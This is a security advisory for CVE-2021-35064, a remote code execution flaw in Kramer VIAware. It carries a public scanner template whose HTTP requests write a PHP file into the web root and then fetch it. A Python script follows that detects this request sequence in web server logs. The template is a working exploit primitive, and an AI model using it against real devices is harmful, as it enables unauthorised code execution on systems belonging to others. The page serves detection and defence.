CVE-2021-35064: Kramer VIAware - Privilege Escalation and Remote Code Execution

Date: 2025-08-01 | Affected software: Kramer VIAware | PoC: Public

Vulnerability Description

All tested versions of Kramer VIAware allow privilege escalation and remote code execution because of misconfigured sudo permissions. If the web interface is reachable, an attacker can execute arbitrary system commands remotely, because privileged operations are mishandled in ajaxPages/writeBrowseFilePathAjax.php and the sudoers configuration is improper.

PoC code [public]

id: CVE-2021-35064

info:
  name: Kramer VIAware - Privilege Escalation and Remote Code Execution
  author: ritikchaddha
  severity: critical
  description: |
    Kramer VIAware, all tested versions, allow privilege escalation and remote code execution due to misconfigured sudo permissions. Attackers can execute arbitrary system commands remotely if the web interface is accessible, due to vulnerabilities in the handling of privileged operations through ajaxPages/writeBrowseFilePathAjax.php and improper sudoers configurations.
  remediation: |
    Apply the latest firmware update provided by Kramer to fix misconfigured sudoers permissions and ensure proper validation in the web interface.
  reference:
    - http://packetstormsecurity.com/files/166623/Kramer-VIAware-Remote-Code-Execution.html
    - https://www.kramerav.com/us/product/viaware
    - https://www.exploit-db.com/exploits/50856
    - https://write-up.github.io/kramerav/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-35064
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-35064
    cwe-id: CWE-269
    epss-score: 0.85692
    epss-percentile: 0.99328
    cpe: cpe:2.3:a:kramerav:viaware:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: kramerav
    product: viaware
    fofa-query: icon_hash="1521468900"
  tags: cve2021,cve,viaware,kramer,edb,rce,intrusive,kramerav,vkev,vuln

variables:
  useragent: "{{rand_base(6)}}"

http:
  - raw:
      - |
        POST /ajaxPages/writeBrowseFilePathAjax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        radioBtnVal=%3C%3Fphp+echo+md5%28%22CVE-2021-35064%22%29%3B+%3F%3E&associateFileName=%2Fvar%2Fwww%2Fhtml%2F{{randstr}}.php

      - |
        GET /{{randstr}}.php HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body_2
        words:
          - "44f63b292601ec4ab0d8c3244c9f5ebe"
# digest: 4b0a0048304602210082d3ce25e2ec9736a4043d5a60bf2f52a268145bcf32eac3fc332d526867ae570221008838efee4368e8785df287b432650a1b775e1b44a151c83bee7a6b32a504443f:922c64590222798bb761d5b6d8e72950
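
For defenders, the two-request sequence in the template above (a POST to the write endpoint, then a GET for a new .php file in the web root) can be hunted for in web server access logs. The following is an added example, not part of the template or of any Kramer code; it assumes the Apache/nginx "combined" log format and a five-minute correlation window, and the function name and sample log lines are constructed for illustration.

```python
import re
from datetime import datetime, timedelta

# Assumption: Apache/nginx "combined" access log format.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
WRITE_ENDPOINT = "/ajaxPages/writeBrowseFilePathAjax.php"
# A .php file directly in the web root, as the template's second request fetches.
ROOT_PHP_RE = re.compile(r"^/[^/?]+\.php(\?.*)?$")
WINDOW = timedelta(minutes=5)  # assumption: correlation window


def find_write_then_fetch(lines, window=WINDOW):
    """Return (ip, post_time, fetched_path, status) for each root-level .php
    GET that follows a POST to the write endpoint from the same client."""
    last_post = {}  # client ip -> time of most recent POST to the endpoint
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the assumed format
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        path = m["path"].split("?")[0]
        if m["method"] == "POST" and path == WRITE_ENDPOINT:
            last_post[m["ip"]] = ts
        elif m["method"] == "GET" and ROOT_PHP_RE.match(m["path"]):
            posted = last_post.get(m["ip"])
            if posted is not None and timedelta(0) <= ts - posted <= window:
                hits.append((m["ip"], posted, path, int(m["status"])))
    return hits


# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE = [
    '198.51.100.7 - - [01/Aug/2025:10:00:01 +0000] "POST /ajaxPages/writeBrowseFilePathAjax.php HTTP/1.1" 200 12 "-" "x"',
    '198.51.100.7 - - [01/Aug/2025:10:00:02 +0000] "GET /a1b2c3.php HTTP/1.1" 200 32 "-" "x"',
    '203.0.113.9 - - [01/Aug/2025:10:00:03 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "x"',
    '198.51.100.7 - - [01/Aug/2025:11:30:00 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "x"',
]

if __name__ == "__main__":
    for ip, posted, path, status in find_write_then_fetch(SAMPLE):
        print(f"{ip} POSTed to {WRITE_ENDPOINT} at {posted}, then fetched {path} ({status})")
```

Access logs normally omit POST bodies, so this matches on the request sequence rather than the written content; a hit with status 200 on the fetched file is the one to triage first.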
